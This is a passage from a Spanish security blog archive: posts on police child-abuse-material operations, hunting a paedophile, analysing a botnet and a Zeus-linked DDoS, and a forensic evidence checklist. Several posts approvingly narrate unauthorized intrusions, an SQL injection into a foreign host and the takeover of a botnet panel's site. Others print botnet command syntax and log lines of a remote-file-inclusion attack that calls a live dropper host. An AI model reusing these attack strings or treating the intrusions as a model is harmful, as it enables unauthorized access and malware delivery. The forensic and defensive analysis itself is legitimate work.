Con las posibilidades de esta herramienta, los policías introdujeron en la aplicación 857 enlaces "p2p", correspondientes a vídeos de contenido ilícito y obtenidos gracias a la colaboración ciudadana mediante denuncias de particulares en Comisarías.

El resultado fue el siguiente: en el transcurso de la investigación se analizaron más de 20.000 conexiones y se seleccionó exclusivamente aquellas conexiones de usuarios que se hubiesen descargado en su totalidad los archivos ilícitos con un nombre que aludiera específicamente a material pornográfico infantil.

Se identificaron a 125 usuarios ubicados en España y que estaban distribuyendo los archivos investigados disponibles en la red y cuyas conexiones se encontraban asociadas a proveedores de acceso a internet también situados aquí.

Cada identificado se había descargado en sus equipos informáticos varios archivos de contenido pedófilo de extrema dureza, como agresiones sexuales a menores de muy corta edad, y los habían puesto a disposición de la red.

La mayor parte de las detenciones se han practicado en el País Vasco, Andalucía y Cataluña, con diez arrestos en cada una de las Comunidades, además de ocho en la Valenciana, siete en la de Madrid, tres en Castilla-La Mancha y en Cantabria, dos en Aragón y uno en Murcia, Asturias, Canarias y Extremadura

La "ciber-redada" se ha desarrollado en menos de tres días en los que se han practicado casi un centenar de registros: Álava (3), Alicante (1), Almería (1), Asturias (2), Badajoz (1), Barcelona (16), Cáceres (2), Cádiz (7), Cantabria (5), Castellón (1), Ciudad Real (1), Cuenca (1), Gerona (1), Granada (1), Guipúzcoa (4), Huelva (2),La Rioja (2), Las Palmas (2), Lérida (1), Madrid (11), Málaga (2), Murcia (1), Palma de Mallorca (2) y Pontevedra (3).

También en Sevilla (1), Tarragona (1), Teruel (1), Toledo (2), Valencia (12), Valladolid (1),Vizcaya (5), Zaragoza (1).

¿Donde estás lolisex? (Parte I)

2010-10-06T11:06:00.000+02:00

Hola Lectores,

Carlos es una persona aparentemente normal, que en su vida hace las cosas que hacemos todas las personas normales, trabaja cerca de donde trabajas tú y es vecino de tu barrio, es amable, educado y culto, con unos ingresos medio-altos y es posible que hasta lo hayas saludado más de una vez. Pero la realidad a veces supera la ficción Carlos realmente es Lolisex un sujeto de aproximadamente 35 años, es un depredador sexual, que utiliza las redes sociales como medio de caza, también utiliza diversas personalidades, edades y sexos, su orientación sexual como el se define es 'amante de niños' conocido en el ambiente como 'BoyLovers'

Hoy voy a contar un caso, que todavía está en investigación, pero que considero importante para que si algunos/as os pasa, por favor lo denunciéis. (En algunas de mis charlas lo suelo contar)

Como os habréis imaginado, he cambiado nombres y direcciones IP's, todo lo demás está en la denuncia.

Antes quiero aclarar como se pronuncian en España las leyes y voy a aclarar que es la pornografía infantil.

Se denomina pornografía infantil a toda representación de menores de edad de cualquier sexo en conductas sexualmente explícitas. Puede tratarse de representaciones visuales, descriptivas (por ejemplo en ficción) o incluso sonoras.

En España, según artíulo 189.1.a del Código Penal, se establece pena de prisión para "El que utilizare a menores de edad o a incapaces con fines o en espectáculos exhibicionistas o pornográficos, tanto públicos como privados, o para elaborar cualquier clase de material pornográfico, cualquiera que sea su soporte, o financiare cualquiera de estas actividades.". Sin embargo, en el punto segundo del citado artículo, se establece asimismo pena de prisión o multa por la sola posesión de material pornográfico, aunque cita para su propio uso, lo cual establece dudas sobre la voluntariedad de la posesión, y tampoco especifica si esto es aplicable a todo tipo de material y a todo tipo de soporte o formato.

Del artículo 189.7 puede interpretarse que la pornografía infantil no foto/vídeográfica (dibujos, animaciones) no es ilegal en España mientras no se hayan utilizado las imágenes o voz modificadas de un menor

LOLISEX

Lolisex es un 'pájaro' pederasta que en mi opinión personal, vende pornografía infantil, o como mínimo trafica con ello.

Vamos a ver como lo descubrimos:

Nuestra herramienta Spectum

Recibimos un correo en nuestro Honey-Spam (lo llamamos spectum). Este es un servidor con relay abierto y en el cual corre una aplicación que en base a una lógica y como parámetros de unos determinados 'strings' conseguimos obtener una copia del correo para su posterior análisis. Nuestro objetivo es monitorizar posibles phisings cuyo destino son los usuarios de entidades financieras. Aunque nuestro producto es primitivo (tiembla proyecto echelon) hemos conseguido añadir funcionalidades como temas de pornografía infantil y últimamente estamos practicando con temas de terrorismo.

Como os iba diciendo recibimos este correo:

Como podemos apreciar en color amarillo, se anuncia algo parecido a comercializar con vídeos de niños y en la parte inferior tenemos una web como referencia. ¿que será esa web? salgamos de dudas.

Bueno, todo apunta a una bonita página alojada en un hosting en Rusia, donde se pueden subir imágenes, como no ofrece mucha información, voy a mirar por encima, es decir el hosting en si, proveedor, directorios virtuales, ficheros de configuración etc. Para ello voy a utilizar la herramienta DIRB, desarrollada por Ramón conocido en el mundillo de la seguridad como darkraver.

Este es el resultado que nos llevo al descubrimiento:

Tenemos un directorio de nombre "pappusi", lo más interesante de todo es que tenemos evidencias de ficheros dentro del directorio con alto contenido sexual y además visibles , es decir el servidor web Apache, no tiene la clausula "Options -Indexes" activada (vaya cagada del administrador).

Vamos a comprobarlo.

Esta foto es de las más normales, pero vimos algunas de miedo.

Revisando los directorios virtuales y diversos ficheros nos vamos dando cuenta que hay foros (álbum) protegidos por contraseña, la cuestión es como nos podemos hacer con uno de estos, para poder ver la información que contiene.

Después de varias revisiones sin éxito, nos proponemos pasar a la acción. ¿Probamos con un SQL Inyection? La probabilidad de que tenga MySQL es alta dado que está desarrollado en PHP, vamos aprobar aleatoriamente...con algunos comandos y.......

OOOPSS!!! ¡¡PREMIO!!

Bueno, a partir de aquí, solo os diré que nos hicimos con las contraseñas de las bases de datos y pudimos entrar a la mayoría de los foros.

Ni que decir tiene como se lo montan estos pederastas, hay un foro en particular que solo hay imágenes con poses de niñas modelo, en algún caso con autorización de los padres (¿un padre hace eso con su hija?). Desgraciadamente en esta vida, siempre hay desgraciados que a sus vez desgracian a sus hijos.

Aquí tenéis un ejemplo:

Mirando el listado de foros nos sorprende estos que están en Español (con contraseña)

Una vez dentro de uno de ellos nos encontramos con muchas imágenes de este tipo

Y al final de las imágenes comentarios sobre la foto y como podréis apreciar hay un tipo con la bandera de España. ¡¡ Vamos a por el !!.

Como se puede apreciar disponemos de una dirección IP, de dos cuentas de correo, fechas y hora. Con esa información vamos a sacar su perfil, su registro y por donde se mueve este pájaro y donde tiene el nido.

En la siguiente entrega veremos su blog y sitios que frecuenta y como con un poco de ingeniería social conseguimos identificarlo y atraparlo...

En primera Línea de fuego

2010-09-23T12:29:00.004+02:00

Hola lectores,

Eduardo y yo, estuvimos visitando a los colegas de la Brigada de Investigación Tecnológica y al Grupo de Delitos Telemáticos de la Guardia Civil.

Como ya veníamos diciendo en diferentes post, en España hay muy buenos profesionales en el mundo de la seguridad y casi siempre estamos hablando y entendiendo que están en la empresa privada, o bien como freelance, pero no hay que olvidarse de las personas que están en la línea de fuego, aquellas cuyo servicio y objetivo es proteger a las personas y perseguir el delito en la red

Hoy quiero destacar la gran experiencia que tienen los componentes de la BIT y GDT. Ellos son la primera línea, muy profesionales y técnicamente están a muy alto nivel. Podríamos decir que estamos en muy buenas manos y si yo fuera el delincuente, el pederasta o el criminal, estaría cagado de miedo con estos compañeros.

Os dejo alguna foto de nuestra visita.

BRIGADA DE INVESTIGACIÓN TECNOLÓGICA (BIT)

GRUPO DE DELITOS TELEMÁTICOS DE LA GUARDIA CIVIL (GDT)

¡¡ Vendo Botnets baratas, Señoras y Señores...!!!

2010-09-20T12:24:00.000+02:00

Hola lectores,

A raíz del último ataque de denegación de servicio (ddos) que recibimos y que afortunadamente no llego a mayores, me dio por pensar y por pensar mal.

Todo esto viene al caso de lo siguiente, el otro día apareció por nuestros 'tarritos de miel' una curiosa mosca, a la que seguimos la pista hasta ver por donde vivía y nos encontramos con un sitio web que contenía un curioso panel de control . Tras 'poseer' el sitio web a través de una vulnerabilidad (que tiene el proveedor ruso que aloja las páginas) pudimos analizar en profundidad su contenido.

Basicamente este es así:

Y este su acceso vía web (se ha ocultado la URL por motivos de seguridad)

Se trata de n0ise Bot, un software diseñado exclusivamente para reclutar zombis y ejecutar ataques de denegación de servicio distribuida. Mirando lo que hace vemos que los comandos que pueden ser empleados a través de la configuración de este malware son los siguientes:

Syn-Flood - synflood*Host*Port*Threads*Sockets
HTTP-Flood - httpflood*Host*Threads
UDP-Flood - udpflood*Host*Port*Threads*Sockets*Packetsize
ICMP-Flood - icmpflood*Host*Port*Threads*Sockets*Packetsize
Multi Stealer - steal*Link to Uploadscript
Download and Execute - downandexe*LinkToFile
Visit Page - visit*Link
Bot Update - update*LinkToNewBot
Remove Bot - remove*Name

Vamos una maravilla de herramienta diseñada exclusivamente para 'joder' actualmente dispone de 1.566 Zombis.

Sin entrar en detalles sobre esta 'utilidad' (ya que no deja de ser un pack muy parecido a Zeus) me asombra la facilidad de conseguir este software que por cierto es de pago. Mirando el código de la aplicación aparece el sitio donde se puede comprar. (y encima te hacen un descuento de 10 euros). También me asombra lo que ellos llaman programa de afiliados, que son 'sites' donde se hace publicidad sobre su producto e intercambian en diversos foros

Cómo se ve en la primera imagen, el precio de n0ise Bot es de 50€ (solo el ejecutable sin el constructor) y 150€ (programa de por vida incluyendo actualizaciones)

El pago se realiza por medio de paysafecard, un sistema de pago online. (paysafecard es una empresa de dinero electrónico autorizada y regulada por el Financial Services Authority (FSA) en el Reino Unido).

LLegado a este punto, pienso, bueno y ya que estoy aquí que podemos hacer, ¿funcionará realmente esta Botnet?. ¿Y si atacamos alguna infraestructura en China?, ¿o bien algún site con SCADA?, ¿ y si empezamos la primera ciberguerra mundial, atacando a los EEUU?. Bueno no soy tan malo y me voy a portar bien atacandome a mi mismo.Vamos a comprobarlo.

¡¡EMPEZAMOS!!

Lo primero es infectarme una máquina virtual y agregarla como soldado a mi regimiento de zombis. De esta forma podré saber como funciona el BOT y que cualidades tiene.(También me valdrá para futuros posts)

De momento valga como adelanto las claves del registro que está tocando:

HKEY_CLASSES_ROOT\Interface\{2e9937fc-cf2f-4f56-af54-5a6a3dd375cc}
HKEY_CLASSES_ROOT\Interface\{741de825-a6f0-4497-9aa6-8023cf9b0fff}
HKEY_CLASSES_ROOT\Interface\{cf54be1c-9359-4395-8533-1657cf209cfe}
HKEY_CLASSES_ROOT\CLSID\{147a976f-eee1-4377-8ea7-4716e4cdd239}
HKEY_CLASSES_ROOT\Typelib\{d518921a-4a03-425e-9873-b9a71756821e}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256a51-b582-467e-b8d4-7786eda79ae0}
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{00a6faf1-072e-44cf-8957-5838f569a31d}

Segundo es mandar una orden a mi ejercito para realizar una denegación de servicio sobre uno de los servidores que disponemos en la empresa y que está pensado para este tipo de cosas. Es decir totalmente segmentado y con control de tráfico de red, también disponemos de una conexión a internet dedicada

Vamos a mandarle (mandarnos) un HTTP-Flood y este es el resultado en imágenes.

Si bien no consiguieron tumbar el equipo, ni el servicio web, si que se noto un aumento muy considerable en la lentitud de nuevas conexiones, podríamos decir que la prueba ha sido satisfactoria y que 'mi' ejercito ha conseguido el objetivo de dejarme inaccesible el sitio web.

CONCLUSIONES

Me preguntaba lo sencillo que resulta realizar una denegación de servicio, no hace falta que seas un programador, ni tener experiencia en informática, tan solo tener algo de dinero, tener un contacto y alquilarte una botnet.

Hasta ahora la industria (por llamarlo de alguna forma) del Malware se ha centrado en obtener a través de las mafias los mayores ingresos de incautos usuarios de banca electrónica que se infectan sin saberlo, pero también es preocupante que los terroristas puedan utilizar estas 'infraestructuras'

¿Os imaginais que los terroristas pudieran tener el control de miles de PC's? Que tuvieran el poder de lanzar ataques a las infraestructuras de un país, (como ocurrió en el famoso ciberataque entre la disputa de Rusia y Georgia) sería demoledor y particularmente sencillo.

Delitos Telemáticos de la Guardia Civil

2010-09-08T11:45:00.000+02:00

Hola lectores,

Quiero comunicaros una estupenda noticia, desde el Grupo de Delitos Telemáticos de la Guardia Civil, han creado una nueva sección, en su web, de ALERTAS DE SEGURIDAD INFORMÁTICA. La pretensión es que la lean el mayor número posible de internautas, para que cuando se encuentren con el delito, sepan identificarlo.

Para ello, además de la web, están en Facebook (Chema ya hablo de ello y yo al final y por huevos me tendre que volver a dar de alta) . Han creado el perfil de empresa (administración) en el que cada día publicitan en su muro la alerta de seguridad que sale en la web.Y como ellos dicen, consideran que deben estar donde están los ciudadanos, que son su razón de ser. Y como los ciudadanos están en las redes sociales, allí estan ellos.

Desde ConexionInversa os animo a que accedáis a su web y que si estáis en Facebook, los agreguéis como amigos. Y si lo hacéis, aún os hago una última petición, que sugiráis la página a vuestros amigos.

Cuanta más gente los lea, más gente estará prevenida ante el delito, menos delitos habrá.

Venga, que todos podemos, seguro que conocemos un caso, y ante ello hay que denunciar

¡¡¡ Vamos a por los malos!!!

Como estoy

2010-09-02T09:22:00.000+02:00

Hola lectores,

Hoy es un día especial, especial para mi. Puedo cometer faltas de ortografía , de sintaxis o de existencialidad en las frases, estoy con fiebres, esas fiebres que al final son una extensión de mi mismo.

Muchos sabéis que tengo una enfermedad tropical "fiebre de query" jodido el síntoma para un informático ¿no?, coño se podía llamar de fiebres de 'lahostia', pero no al final de query.

Hoy especialmente me siento sensible, mi capacidad de raciocinio, (como diría mi jefe/amigo Alberto) hoy es limitada.

Pensaba escribir algo interesante que tengo en la chistera. Pero saldría un pufo

Hoy estoy jodido, muy jodido, y aunque se que me recuperare, espero que me perdonéis, por el lapsus, pero prometo volver en unos días. (Pedro es así, un luchador)

Joder como se mueve el sofá y el comedor...

Ciberterrorismo y propaganda

2010-08-27T19:38:00.004+02:00

Hola lectores,

Durante estas semanas estoy al tanto de como se utiliza internet como medio de explotación indirecta para la 'guerra de información" desde ella se utiliza métodos para engañar e influenciar el comportamiento de un público normalmente joven que tiene los suficientes medios técnicos y recursos para utilizarlos.

No olvidemos que los jóvenes de hoy son o pueden ser potencialmente 'bombas' tecnológicas en el futuro.

Es decir no deja de ser guerra psicológica.

El Departamento de Defensa de EE.UU, define la guerra psicológica como:

"El uso planificado de propaganda y otros psicológicos acciones con la finalidad primordial de influir en las opiniones, emociones, actitudes y comportamiento de grupos extranjeros hostiles de tal manera que contribuya a la consecución de los objetivos nacionales.

Durante la semana pasada, he estado siguiendo y consiguiendo un perfil de posibles sitios legítimos de ISP's que sabiéndolo o no, hospedan sitios web islamistas con información propagandística sobre la guerra y terrorismo internacional. Desde ellos se puede sacar un perfil más exacto de personas, ideologías y sus seguidores. (podéis alucinar lo que se encuentra por estos lares)

Para ello he seguido una pauta muy sencilla, primero me he creado un 'robot-araña' que me pudiera buscar sitios web con palabras clave, una vez lanzado he utilizado MALTEGO para poder profundizar sobre alguno de los personajes que aparecen en este listado. (Joder con el Facebook, es mas sencillo), aunque maltego, cumple al 100% con esa información.

Aquí teneis algunos listados:

Disclaimer:

Atención!! alguno de ellos contiene datos y vídeos ofensivos, no me hago responsable de lo que se siente.

http://www.facebook.com/group.php?gid=2331004717
http://www.nodo50.org/csca/agenda2003/resistencia/resistencia.html

http://groups.msn.com/HEZBOALLAH

http://www.albasrah.net/moqawama/english/iraqi_resistance.htm

http://hezboallahpartidoislamico.blogspot.es/

http://br.groups.yahoo.com/group/alqaeda/

http://english.moqawama.org/index.php

http://www.islamicdigest.net/v8core/

http://somod.shiaweb.org/

http://alshahid.org/

http://www.albasrah.net/media/sound/alberno.htm

http://www.facebook.com/people/Moqawama-Islamiya/604466642

http://www.facebook.com/pages/almad-myshal-wn/11712620770

http://almashriq.hiof.no/lebanon/300/320/324/324.2/hizballah/films/

http://weekly.ahram.org.eg/

¿Que pasa? yo lo veo claro...

Post dedicado:

Dos guardias civiles destinados en Afganistán -un capitán y un alférez- y su intérprete (de Zaragoza) -iraní nacionalizado español, de 54 años- han fallecido este miércoles en un tiroteo en la base de Qala e Naw

Que cosas me pasan...

2010-08-19T17:59:00.000+02:00

Hola lectores,

No es que sea muy dado a estas cosas pero el 'Security Porn Star' de Chema Alonso, está cociendo un Calendario Tórrido para el año 2011. El dinero será destinado a una ONG

Y si, ¡¡voy a participar!!, junto a mi amigo Juanito. Seremos la portada del mes de Noviembre (Ya estoy buscando tanga y poniéndome cachas)

Entre otros estaremos:

Marcelo de InfoSpyware
Rubén Santamarta de 48 bits
Cristian Borghello de Segu-Info
Silverhack de Informática64
Raúl Benito de Google, y más por confirmar.

Por lo demás deciros que voy a participar en una ponencia en el ASEGURA IT CAMP2, así que animaros todos los que podáis y acercaros dado que nos lo pasaremos 'pipa' ese fin de semana en cabañas de madera a lo más puro estilo militar, yo soy el encargado de levantaros a las 6:30 de la mañana.

Mientras tanto en esta época estival lo que toca este próximo fin de semana es hacerse una bajada de barrancos, que estoy muy nervioso con esto de las relaciones personales ;-) Hala a pasarlo bien. Y la semana que viene volvemos con fuerza.

Web Historian

2010-08-09T14:38:00.000+02:00

Hola lectores,

Hace mucho tiempo que voy siguiendo la evolución de la empresa MANDIANT que dispone de muchos productos curiosos y productos FREE de lo más interesantes.

Hoy quiero hablar de una herramienta que me ha ayudado en la búsqueda de evidencias forenses en la navegación web y que es de una ayuda incalculable (¡¡ Bravo por los chicos de MANDIANT !!)

Ni que decir tiene existen muchas herramientas en modo comando como 'pasco' o 'galleta', pero he seleccionado esta por su sencillez y rapidez a la hora de elaborar un informe forense.

Estamos hablando de Web Historian.

Web Historian es un programa que permite a un investigador reunir, mostrar y analizar datos de la navegación que se haya producido en un equipo. Más allá de esta simple definición, la herramienta ofrece una interfaz gráfica pero simplista de ver y navegar con grandes volúmenes de datos.

Tal vez la característica más potente es la capacidad de relacionar y ofrecer múltiples puntos de vista de los datos (incluyendo gráficos y línea de tiempo) a través del analizador y la herramienta web de perfiles, con la esperanza de que los investigadores podamos llegar a conclusiones acerca de los datos que nos proporciona.

En la siguiente imágen podemos apreciar la cantidad de navegadores que soporta

Una vez que pulsamos el boton de 'start' comienza el escaneo del equipo en busca de la información de navegación, también es interesante resaltar que podemos copiar los ficheros de historico de otro equipo al que previamente hemos clonado y obtenido sus huellas, para posteriormente tratarlo en el equipo del investigador con el objeto de no alterar posibles pruebas.

Esta pantalla es el resultado del escaneo: (se han tapado datos por motivos de confidencialidad)

Desde ella podemos filtrar, en busca de objetos, imágenes, campos ocultos, etc. Como se puede apreciar dispone de muchos de ellos ya predefinidos y también podemos crearnos los nuestros.

Otra de las carácterisiticas importantes es la obtención de miniaturas ya algunos navegadores graban una instantánea de la imagen de las páginas web que se han accedido. Actualmente, Chrome y Safari son los únicos navegadores que recogen imágenes en miniaturas.

Para ver las miniaturas, disponemos de la ficha "thumbnails".

Website Analyzer

El analizador de sitios web es una representación gráfica muy útil para reducir el tiempo de análisis de grandes conjuntos de datos del historial web con estadísticas e informes visuales.

Para iniciarlo tenemos en Herramientas-> Analizar, en esta versión de momento hay cuatro informes que se pueden ejecutar sobre los datos. Para ejecutar un informe, primero debemos cargar los datos del historial web.

Cualquier informe generado o gráficos se pueden guardar como una imagen PNG para su inclusión en un informe externo.Los informes que puede generar son variados, por ejemplo el circular por dominio permite ver la frecuencia de visita de cada sitio web en el conjunto de datos, y el de línea de tiempo es perfecto para ver la frecuencia por horas.

Y por último otra de las grandes utilidades es el Web Profiler, que permite disponer de una visión completa del sitio visitado.

Lo dicho, otra herramienta (gratuita) que debemos de tener en nuestra caja de herramientas.

Podemos descargarnos esta utilidad desde la web de MANDIANT desde aquí :

http://www.mandiant.com/products/free_software/web_historian/

Buena noticia

2010-08-03T15:15:00.000+02:00

Muy bien por la Ertzaintza!!!

Desde primeras horas de la madrugada de hoy, martes, agentes de la División Antiterrorista y de Información de la Ertzaintza desarrollan un operativo contra la organización terrorista ETA en la localidad guipuzcoana de Hernani. Fruto del mismo ha sido la detención de dos presuntos terroristas a los que, entre otros actos delictivos, se les imputa su participación en el asesinato de Joseba Pagazaurtundua, en febrero de 2003.

Visto en:

http://www.ertzaintza.net/public/wps/portal/ertzaintza

Nos vamos a Almería

2010-07-12T08:29:00.002+02:00

La Universidad de Almería lleva acabo, del 12 al 16 de Julio, el curso de verano "Seguridad en entornos Web. E-Comercio y E-Administración", un curso dirigido tanto a alumnos con perfil técnico, como a alumnos de la rama de economía, empresariales y derecho.

En este curso participaran tanto profesores de la Universidad de Almería como expertos ajenos a la misma.

El Objetivo del curso es poner en conocimiento las actuaciones del Estado en materia de Seguridad Informática, mostrando las ventajas e inseguridades actuales a las que se expone un usuario

Yo aportare mi granito con una conferencia sobre "Autopsia de una intrusión y seguridad en Banca Electrónica por Internet".

Aquí hay más información

Y me han dicho que esta muy bueno el bacalao al estilo Almeriense. ¿será verdad? ;-)

Nos vamos a Valencia...

2010-07-06T09:48:00.000+02:00

Al curso de verano.

Tras realizar las dos ediciones anteriores en Salamanca, este año, de la mano de la Universidad Europea de Madrid, y merced a la colaboración con el Máster Universitario en Seguridad de las Tecnologías de la Información y las Comunicaciones , tendrá lugar en Valencia durante los días 6, 7 y 8 de Julio.

Yo aportaré mi granito de arena el día 7 con la conferencia "Analisis forense en una fuga de datos".

Y degustare eso que dicen del agua de Valencia, con la sed que llevo ;-)

¡¡ Que vienen los Zombis !! (Historia de una denegación de servicio)

2010-06-10T12:56:00.004+02:00

Hola lectores,

Voy a comentar algo que nos puede suceder a todos, una denegación de servicio.

El caso es el siguiente, empresa suministradora de productos de recambios de automóvil, tiene un servicio web (en PHP) de seguimiento de pedidos y comercio electrónico. Desde hace un tiempo parece que el servicio que prestan se degrada, haciendo imposible el acceso a la web.

Viernes 4 de Junio (15:30h)

El servidor web empieza a ir excesivamente lento, parece que va mal la aplicación web. Los informáticos restablecen el servicio.

Lunes 7 de Junio

Parece que el servidor no muestra el contenido de su web o parece que tarda en exceso en servir las páginas, parece que está caido. Tras comprobar que la máquina está bien, se ve que contiene multiples instancias del servidor web apache. Tras reiniciarlo al momento vuelve a tener problemas de carga. Esto se mantiene prácticamente durante todo el día.

Martes 8 de Junio

8:30h .- El servidor sigue sin señales de vida, se precisa con urgencia que el servidor este activo, dado que la mayoria de los pedidos se realiza por comercio electrónico. Gran tensión en el departamento comercial y de compras. Se llega a la conclusión que desconectando el cable de red (el de internet) la aplicación funciona correctamente en localhost

9:30h.- Analizamos lo sucedido:

Aplicación a medida de comercio electrónico en PHP con LAMP, todo monitorizado con Nagios y Awstats.

Empezamos con lo que me dan, analizando las estadisiticas. Podemos ver que efectivamente hay un considerable aumento

Mas cuando nos indican que el pico más alto de visitas es de unos 300 diarios, en el peor de los casos.

Si vemos la memoria de la máquina comprobamos que esta algo saturada

Y si vemos el tráfico de red, ni que decir tiene

Es decir, parece que además del número excesivo de conexiones, hay algo desbocado.

10:00h.- Conseguimos hacer un netstat a la máquina y esta devuelve la sorprendente lista de más de 75.000 conexiones al servidor web, tras direccionarlo a fichero (mas comodo para trabajar) vemos que la mayoria de direcciones viene del rango 222.73.68.X y que la ip 222.73.68.23 es la que más conexiones activas tiene. Tiene pinta de una botnet

Si lo intentamos Geolocalizar vemos que casi todas y especialmente estas son de China

Vamos a grabar el tráfico de red, utilizando TCPDUMP, para posteriormente análizar el mismo.

10:10h.- Vemos el log de apache, esto es importante, despues de un buen rato me choca las líneas que se repiten, especialmente esta:

222.73.68.23/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.24/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php
222.73.68.99/inicio.php?page=asf.wdn.com/dbs/_note/getexe.php

Abro mi máquina virtual y desde el navegador introduzco la URL que me redirecciona al dominio 'asf.wdn.com', que ha su vez me regala un caramelito que más tarde será objeto de estudio

NOTA: Cuidadin que está todavia activa y te descarga algo

10:11h.- Cerramos en el cortafuegos todo el rango posible de la red 222. El servidor empieza a tener mejorias y el servicio se restablece.

10:20h.- Se decide por parte de los responsables cerrar el mayor rango posible de IP's de Asia.

11:00h.- Se cierra el caso y el servidor funciona perfectamente.

12:00h.- Me he llevado el EXE de la página web maliciosa y el tráfico en formato PCAP

13:20h.- Vamos a revisar el fichero del TCPDUMP con Whireshark. Tras un rato veo lo siguiente. Rh/cath/bin..Rhsswdh//pah/etc, todo apunta que además de las conexiones están mandando algo al servidor web

Tiene pinta de lo que es, un Shellcode, vamos a intentar guardar esa porción de código y proceder a su desemsablado

Y ahora que ya lo tenemos vamos a compilarlo y lanzarlo en un entorno controlado.

Bueno, pues todo apunta a un exploit remoto que en aparencia devuelve el contenido del fichero passwd.

AHORA A POR EL EJECUTABLE

Vamos a lanzar en una máquina virtual (sin actualizaciones) windows xp con IE 6.0 y corriendo Process Monitor de Sysinternals y una utilidad que me ha venido muy bien en alguna ocasión que se llama SpyMonitor y que sirve para monitorizar los cambios y ver a posteriori las diferencias.

Estos son los resultados:

Con privilegio de administrador se han creado los siguientes ficheros

%systemroot%\system32\sdra64.exe
%systemroot%\system32\lowsec
%systemroot%\system32\lowsec\user.ds
%systemroot%\system32\lowsec\user.ds.lll
%systemroot%\system32\lowsec\local.ds

Sin ser administradores:

%appdata%\sdra64.exe
%appdata%\lowsec
%appdata%\lowsec\user.ds
%appdata%\lowsec\user.ds.lll
%appdata%\lowsec\local.ds

Cambios que se han realizado en el registro:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

En la clave 'userinit'

"Userinit" = "C:\WINDOWS\system32\userinit.exe

Por esta nueva:

"Userinit" = "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe"

Sin ser administradores

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

En la clave 'userinit'

"Userinit" = "C:\Documents and Settings\%;user%;\Application Data\sdra64.exe"

Googleando y por lo que dicen en los foros, todo apunta a una variante del ya famoso troyano ZEUS y para poner la puntilla he búscado la IP atacante en Zeus Tracker. Zeus Tracker proporciona la posibilidad para realizar un seguimiento de ZeuS (servidores, paneles de control) y los host maliciosos que albergan los archivos de Zeus.

Y aquí tenemos nuestra IP Zombi

Muy, muy curioso...Seguiremos investigando

Quiero agradecer la ayuda a Eduardo Abril, que me ha ayudado en el desemsablado del shellcode

Recolección de evidencias (Parte I)

2010-05-26T05:55:00.001+02:00

Hola lectores,

Muchos sois los que llevais pidiendo información de que métodos son los empleados para la recolección de evidencias.

Voy a tratar de poner en dos post más o menos los pasos que sigo para que de alguna forma sea valido ante el juez, el primer post trata de la parte física y el segundo de un pequeño cuestionario que es interesante cuando no se obtiene toda la información o es parcial.

Aquí os dejo mis reglas de oro que hasta ahora son admitidas por los juzgados

EQUIPOS

Realizar una sesión fotográfica de la sala antes de comenzar la tarea, la entrada y distintas salidas (si las hubiera) como por ejemplo ventanas. Las fotos deben de tener sobreimpresa digitalmente la fecha y hora.
Fotografíe el ordenador de frente con los cables y por detrás, así como dispositivos conectados tal y como se encuentran. Haga más de una foto si es preciso
No utilice el ordenador ni intente buscar pruebas.
Si el equipo está "apagado", no "encender".
Si el equipo está "encendido" y se muestran los mensajes en el monitor, realizar una fotografía de la pantalla.
Si el equipo está "encendido" y la pantalla está en blanco, mueva el ratón o la barra de espacio (esto mostrará la imagen activa en la pantalla). Realice a continuación la fotografía.
Desconecte la fuente de alimentación del router.
Desconecte el cable de alimentación de la parte posterior del equipo (No hacer un apagado ordenado)
Realice un diagrama si es una red y empiece a crear las etiquetas (ver mi etiquetadora profesional) de los dispositivos conectados.
Desconecte todos los demás cables y los dispositivos del equipo.
Tenga preparada bolsas etiquetadas o en su defectos paquetes para el transporte de los dispositivos
Haga lo mismo con los dispositivos extraibles (pendrives)
Mantenga todos los medios de comunicación, incluido el equipo, lejos de los imanes, radiotransmisores y otros elementos potencialmente dañinos.
Recopile manuales de instrucciones, documentación y posible notas que hubiera en el lugar (es recomendable proceder a su etiquetado).
Documentar todos los pasos implicados en la adquisición del ordenador y sus componentes.

Mi etiquetadora:

DISPOSITIVOS MOVILES

Si el dispositivo está apagado "no" encender ".
Con una PDA o teléfonos móviles, si el dispositivo está encendido, NO LO APAGUE. Si se apaga el dispositivo podría habilitar el password de inicio, por lo tanto impediría el acceso a las pruebas.
Fotografíe el dispositivo y la pantalla (si está disponible).
Etiquetar y recoger todos los cables (incluyendo la fuente de alimentación)
Intentar que el dispositivo mantenga la batería en la medida de lo posible
Etiquete el almacenamiento adicional de los dispositivos (Sticks de memoria, compact flash, etc).
Documentar todos los pasos implicados en la adquisición del móvil y sus componentes.

Detenidas 25 personas e imputadas otras 21 por difundir Pornografía Infantil a través de la red Ares.

2010-05-25T16:42:00.001+02:00

Este Grupo de Delitos Telemáticos de la Unidad Central Operativa de la Guardia Civil, en el marco de la operación “MERCADILLO”, desarrollada en varias comunidades autónomas, ha procedido a la detención de 25 personas e imputación de otras 21, por facilitar la distribución de archivos de contenido pedófilo a través de la red P2P ARES.

Durante la operación se han efectuado un total de 49 registros domiciliarios en los que se han intervenido numerosos dispositivos informáticos con contenido pedófilo.

Para llevar a cabo dicha búsqueda, los agentes se han valido de la nueva versión del buscador denominado “NAUTILUS” desarrollado por el Grupo de Delitos Telemáticos, cuyo objetivo es la detección del intercambio de material pedófilo a través de la red P2P ARES.

La selección de objetivos de entre todos los usuarios identificados por compartir alguno de los videos de pornografía infantil, se ha realizado siguiendo criterios jurisprudenciales que establecen un mínimo de ficheros pedófilos compartidos, para evitar conductas ocasionales o accidentales.

VISTO EN: La web de la Guardia Civil

2 PARTE de: Te puede pasar a ti...(Forensics iPhone)

2010-05-05T17:38:00.002+02:00

Hola lectores,

Vamos a continuar con la búsqueda del vídeo en el ordenador del menor, dado que el móvil iPhone ha desaparecido y por lo tanto no se puede analizar.

Los iPhone, disponen de una cámara compatible con los formatos de vídeo estándar y que graba unos 30 fotogramas por segundo en estéreo en los formatos de archivo M4a, M4v, MP4 y MOV. También cuando se graba un vídeo se almacena por defecto en una unidad flash (de 8, 16 o 32 GB). Como es de esperar en alguna sincronización entre el iphone e iTunes se habrá copiado las fotos y vídeos al disco duro del ordenador.

